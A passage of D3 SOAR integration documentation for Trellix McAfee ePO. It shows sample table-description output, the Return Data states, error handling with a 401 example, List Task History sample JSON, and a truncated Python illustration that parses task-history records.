This query type and its results depend on running a roll up data: Managed Systems server task on this McAfee ePO server. Click \\\\\\\"?\\\\\\\" for more information.\\\",\\r\\n\\t\\t\\t\\\"Product Improvement Program Properties\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"System Health Indicator\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about Incidents-related DLP data at rest. As received from managed systems from selected registered servers.\\\",\\r\\n\\t\\t\\t\\\"Table to show Active Response custom events\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information about client events from managed systems.\\\",\\r\\n\\t\\t\\t\\\"Product Coverage Reports Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Capture search list\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"Classification\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data in-use/motion\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Computers\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Client interface logon audit log\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Java Client Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Data Inventory from DLP Discover scans\\\",\\r\\n\\t\\t\\t\\\"Source Application Information \\\",\\r\\n\\t\\t\\t\\\"fwClientRule.RemoteNetworkDescription\\\",\\r\\n\\t\\t\\t\\\"System Tree\\\",\\r\\n\\t\\t\\t\\\"Select \\\\\\\"Issues\\\\\\\" to view issues created by users and reported by other extensions.\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Java Client Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee Threat Intelligence Exchange 
Server Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Network discovery interactive action information \\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Data Inventory from DLP Discover scans\\\",\\r\\n\\t\\t\\t\\\"Rolled up Endpoint Security Threat Events from registered servers.\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Data Inventory from DLP Discover scans\\\",\\r\\n\\t\\t\\t\\\"Policy Information\\\",\\r\\n\\t\\t\\t\\\"Systems Per Product\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information \\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information about client events sent from managed systems from selected registered servers.\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Platform Properties\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Endpoint System Threat Prevention Custom Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Azure Discovery Properties\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"capture_dataset_table_desc\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Destination User Information\\\",\\r\\n\\t\\t\\t\\\"Tag Groups\\\",\\r\\n\\t\\t\\t\\\"DLP Case Endpoint Discovery Incidents (Hidden)\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"DLP OCR Addon Properties\\\",\\r\\n\\t\\t\\t\\\"Server Keys\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery 
Scan\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Allows you to query upon messages logged by a top-level task.\\\",\\r\\n\\t\\t\\t\\\"capture_dataset_table_desc\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Retrieves information from Extended Computer Properties\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Tag Type Description\\\",\\r\\n\\t\\t\\t\\\"Retrieves information from Tags\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Retrieves information on DLP Data In-use/motion Incidents sent from managed systems from selected registered servers.\\\",\\r\\n\\t\\t\\t\\\"Destination User Groups\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Automatic Registration Documents Classification\\\",\\r\\n\\t\\t\\t\\\"Network discovery interactive action information \\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"DLP Monitor Properties\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"System properties specific to systems from Microsoft Azure.\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about status events from McAfee ePO.\\\",\\r\\n\\t\\t\\t\\\"Manual Registration Documents\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"fwClientRule.ApplicationDescription\\\",\\r\\n\\t\\t\\t\\\"Table to show MVISION EDR custom events\\\",\\r\\n\\t\\t\\t\\\"Retrieves the blocked and whitelisted IP addresses.\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"Cloud Volume belonging to any vendor\\\",\\r\\n\\t\\t\\t\\\"This is a combination of the ePO Threat Events data and the Endpoint Security Exploit Prevention Events data\\\",\\r\\n\\t\\t\\t\\\"Displays error 
conditions enforcing policy or collecting properties.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Properties of the DLP clients\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR System\\\",\\r\\n\\t\\t\\t\\\"Event Product\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"User Information\\\",\\r\\n\\t\\t\\t\\\"DLP Prevent Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DXLBroker Properties \\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Capture search results list \\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Retrieves LDAP information about systems that have been added to your System Tree.\\\",\\r\\n\\t\\t\\t\\\"discovery_incidents.classification_condition_desc\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about changes and actions made by users of this server.\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Common Appliance Management\\\",\\r\\n\\t\\t\\t\\\"Statistics About McAfee Product Usage\\\",\\r\\n\\t\\t\\t\\\"fwClientRule.ApplicationDescription\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Agent Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Status of products like VSE, Host IPS, Application Control etc. 
on the Cloud systems\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about users and permissions of this server.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"Shows DXL Broker related properties\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about Threat Events sent from managed systems.\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Stores the vendor-specific properties for cloud volume\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information about what client tasks have been applied to what managed systems.\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Client Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Shows DXL Client related properties\\\",\\r\\n\\t\\t\\t\\\"Active Response Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Appliance Management Properties\\\",\\r\\n\\t\\t\\t\\\"Rolled up Endpoint Security Firewall properties from registered servers.\\\",\\r\\n\\t\\t\\t\\\"Hyper-V system properties are discovered by Hyper-V connector.\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Stores the vendor-specific properties for cloud volume\\\",\\r\\n\\t\\t\\t\\\"DLP Server Properties\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about Threat Events sent from managed systems from selected registered servers.\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information \\\",\\r\\n\\t\\t\\t\\\"Rolled up Endpoint Security Web Control properties from registered servers.\\\",\\r\\n\\t\\t\\t\\\"Classification\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"DC Assessment Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery 
Scan\\\",\\r\\n\\t\\t\\t\\\"Retrieves technology information about Endpoint Systems\\\",\\r\\n\\t\\t\\t\\\"List Of Client Interface Locked Machines\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Host Cache Item Description\\\",\\r\\n\\t\\t\\t\\\"Cache Info Description\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"Rolled up Endpoint Security Threat Prevention properties from registered servers.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Allows you to query upon messages logged by a task's subtask.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Classification\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about DLP Operational Events sent from managed systems from selected registered servers.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information \\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"Retrieves data on compliance counts over time. This query type and its results depend on a Run Query server task that generates compliance events from the results of a (Boolean pie chart) query. Also, when creating a Compliance History query, make sure that the time unit matches the schedule interval for the server task. 
McAfee recommends creating the Boolean pie chart query first, followed by the server task that generates the compliance events, and finally the Compliance History query.\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Aggregator Properties\\\",\\r\\n\\t\\t\\t\\\"User Information\\\",\\r\\n\\t\\t\\t\\\"System properties specific to systems from Amazon Web Service \\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error details\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data at rest (Endpoint)\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events History\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"Cases related to DLP incidents\\\",\\r\\n\\t\\t\\t\\\"Properties of the DLP client sessions\\\",\\r\\n\\t\\t\\t\\\"Info of Endpoint Discovery Scans\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data in-use/motion\\\",\\r\\n\\t\\t\\t\\\"Computers\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"discovery_incidents.classification_condition_desc\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Scan Information\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information\\\",\\r\\n\\t\\t\\t\\\"User Groups\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Installed Versions Summary\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"System 
Tree\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path\\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Table that holds the Discover Server Information\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Installed Versions Summary\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data at rest (Network)\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"Data Inventory from DLP Discover scans\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Policy Information\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error details\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Destination User Information\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"SessionRules_table_desc\\\",\\r\\n\\t\\t\\t\\\"Network discovery interactive action information \\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Rules 
Information\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Export Details\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information \\\",\\r\\n\\t\\t\\t\\\"Source Application Information \\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data at rest (Endpoint)\\\",\\r\\n\\t\\t\\t\\\"discovery_incidents.classification_condition_desc\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data in-use/motion\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Destination User Groups\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Network discovery interactive action information \\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Policies of the DLP client sessions\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data at rest (Network)\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Email - Matched 
Recipients\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information \\\",\\r\\n\\t\\t\\t\\\"Classification\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"User Information\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Status of Discovery scans\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"Properties of the DLP clients\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"Retrieves file paths from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves summarized non-Enterprise reputation for files from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"tieserver.fileParent.tableInfo.desc\\\",\\r\\n\\t\\t\\t\\\"Retrieves summarized Enterprise Reputation for files\\\",\\r\\n\\t\\t\\t\\\"Retrieves certificates information from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves associated certificate enterprise reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves certificates information from TIE Server\\\",\\r\\n\\t\\t\\t\\\"Retrieves certificates information from TIE Server\\\",\\r\\n\\t\\t\\t\\\"Retrieves file MWG reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves summarized non-Enterprise reputation for certificates from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves associated certificate GTI reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves file information from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves summarized non-Enterprise reputation for files from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about systems with new 
certificates.\\\",\\r\\n\\t\\t\\t\\\"Retrieves file information from the TIE Server.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information about systems with new files.\\\",\\r\\n\\t\\t\\t\\\"Retrieves certificate GTI reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves file GTI reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Certificates\\\",\\r\\n\\t\\t\\t\\\"Retrieves summarized non-Enterprise reputation for files from the TIE Server.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves file names from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves file Enterprise reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves certificate Enterprise reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves file reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves file CTD reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"TIE Server cleanup trending summary\\\",\\r\\n\\t\\t\\t\\\"Retrieves file ATD reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves files from the TIE Server.\\\"\\r\\n\\t\\t]\""
}

Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful

Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CODE
No Sample Data

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. These details can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the specific input and/or API call at which the command failed.

List Table failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system, which can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission settings in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

List Table failed.

Status Code: 401.

Message: Unauthorized.

List Task History

Retrieves a list of all task histories.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:01:41-08:00",
        "endDate": "2019-12-09T18:01:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "jhou Sync Status",
        "startDate": "2019-12-09T18:05:36-08:00",
        "endDate": "2019-12-09T18:06:02-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "accountSyncStatusTaskSource",
        "duration": "Less than a minute"
    },
    {
        "id": "966977",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:06:42-08:00",
        "endDate": "2019-12-09T18:06:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    }
]
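
The following Python is added here as an illustration and is not part of D3's or Trellix's code. It loads Raw Data in the shape shown above, computes the real elapsed time from startDate and endDate (the duration field is only a coarse label), and flags records that need review. The allow-listed user names, the 300-second threshold, and the sample values marked as constructed are assumptions.

```python
import json
from collections import Counter
from datetime import datetime

# Constructed sample shaped like the List Task History Raw Data above.
# The ids, the "Failed" status, the "jdoe" user, the "12 minutes" label and the
# record without an endDate are made up for illustration; they are not ePO output.
SAMPLE_RAW_DATA = """
[
  {"id": "1001", "name": "Threat Detected",
   "startDate": "2019-12-09T18:01:41-08:00", "endDate": "2019-12-09T18:01:42-08:00",
   "userName": "system", "status": "Completed", "taskSource": "response",
   "duration": "Less than a minute"},
  {"id": "1002", "name": "jhou Sync Status",
   "startDate": "2019-12-09T18:05:36-08:00", "endDate": "2019-12-09T18:06:02-08:00",
   "userName": "system", "status": "Completed",
   "taskSource": "accountSyncStatusTaskSource", "duration": "Less than a minute"},
  {"id": "1003", "name": "TIE Server Monitoring",
   "startDate": "2022-12-08T17:15:23-08:00", "endDate": "2022-12-08T17:27:23-08:00",
   "userName": "admin", "status": "Failed", "taskSource": "scheduler",
   "duration": "12 minutes"},
  {"id": "1004", "name": "Manage DXL Brokers",
   "startDate": "2022-12-09T00:00:23-08:00",
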